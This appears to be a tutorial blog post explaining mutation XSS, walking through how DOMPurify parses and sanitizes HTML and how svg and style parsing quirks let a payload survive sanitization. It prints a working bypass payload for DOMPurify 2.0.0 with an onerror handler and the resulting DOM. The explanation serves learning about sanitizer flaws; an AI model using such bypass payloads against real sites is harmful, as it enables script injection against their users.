What is mXSS?
-
Due to parsing differences between sanitizers (e.g., DOMPurify) and browsers, input can be mutated (or transformed) when appended to the DOM tree using
innerHTML
. -
In simple terms, abusing these parsing differences is called mXSS (mutation XSS).
How Does an HTML Sanitizer Work?
-
Parsing: The HTML content is parsed into a DOM tree, either on the server or in the browser.
-
Sanitization: The sanitizer iterates through the DOM tree and removes any dangerous or harmful content.
-
Serialization: After sanitizing, the DOM tree is serialized back into an HTML string.
-
Re-parsing: The serialized HTML is reassigned to
innerHTML
, triggering another parsing process. -
Appending to Document: Finally, the sanitized DOM tree is appended to the document.
DOMPurify – Behind The Scenes
A client-side JavaScript library used to sanitize HTML inputs and prevent XSS attacks.
Execution Flow
DOMPurify Internals
-
_initDocument
Uses DOMParser API to parse unsafe input into a DOM structure. -
_createNodeIterator
UsesNodeIterator
to traverse each DOM node in order. -
-
Checks for DOM clobbering and known attack vectors like mXSS.
-
Removes or escapes disallowed tags (e.g.,
<script>
,<iframe>
, etc.).
-
-
-
DOMPurify normally skips
<template>
and Shadow DOM. -
This function recursively dives into fragments and sanitizes those too.
-
-
_sanitizeAttributes
- Goes through each attribute (
onclick
,href
,src
, etc.) and strips or modifies malicious ones.
- Goes through each attribute (
-
body.innerHTML
- After sanitization, the DOM is serialized back into clean HTML and reinserted into the page.
Get Our Hand Dirty
Let’s understand what is mXSS with a small example:
element.innerHTML = '<u>some <i> HTML'
After inserting using innerHTML
, when we retrieve the HTML, it looks different than the input.
<u>
Some
<i>HTML</i>
</u>
This happens because HTML is designed to be fault-tolerant.
The svg Magic
element.innerHTML = '<svg><p>is this in svg?</svg>'
This gets parsed as:
<svg></svg>
<p>is this in svg?</p>
Here, <p>
is moved out of <svg>
since it’s not a valid child.
More Examples
-
<svg>
tag can’t have<p>
as a child. -
<form>
tag cannot contain a nested<form>
. -
<style>
treats everything inside as text, even if it’s a tag.
[More such rules here].(https://sonarsource.github.io/mxss-cheatsheet/)
The Escape
element.innerHTML = '<svg></p>is this is in svg?</svg>'
This gets parsed into:
<svg>
<p></p>
is this is in svg?
</svg>
Now mXSS is possible! DOMPurify gets bypassed because it assumes <svg>
can’t contain malicious tags. But the browser parses it differently.
<svg></p>
becomes a base for mXSS payloads inside <svg>
.
Example:
<svg></p><style><a id="</style><img src=1 onerror=alert(1)">
DOM becomes:
<svg>
<p></p>
<style>
<a id="</style><img src="1" onerror="alert(1)">
">
</style>
</svg>
This XSS triggers even though it’s inside a <style>
block. That’s because **<svg>**
** changes the parsing rules to XML** (foreign content), which behaves differently.
Abuse in DOMPurify v2.0.0
Payload:
<svg></p><style><a id="</style><img src=1 onerror=alert(1)">
- DOMPurify doesn’t sanitize the
onerror
attribute because it thinks everything inside<style>
is just text.
- But when this is inserted into the DOM using
innerHTML
, the browser parses it differently:
<svg></svg>
<p>
<style><a id="</style>
<img src="1" onerror="alert(1)">
">
</p>
Why Does <svg>
Close Early?
Even though we expected it to close at the end, the presence of `<style>` causes the parser to exit "foreign content mode."
-
According to § 13.2.6.5: Parsing foreign content, when the parser is inside a foreign element (like
<svg>
) and sees a tag that isn’t allowed (like<style>
), it exits the foreign mode. -
It pops
<svg>
off the stack and reprocesses the next tag (<style>
) in HTML mode, continuing normally.
Bonus:
ChatGPT is my friend 😄 – See my chat with it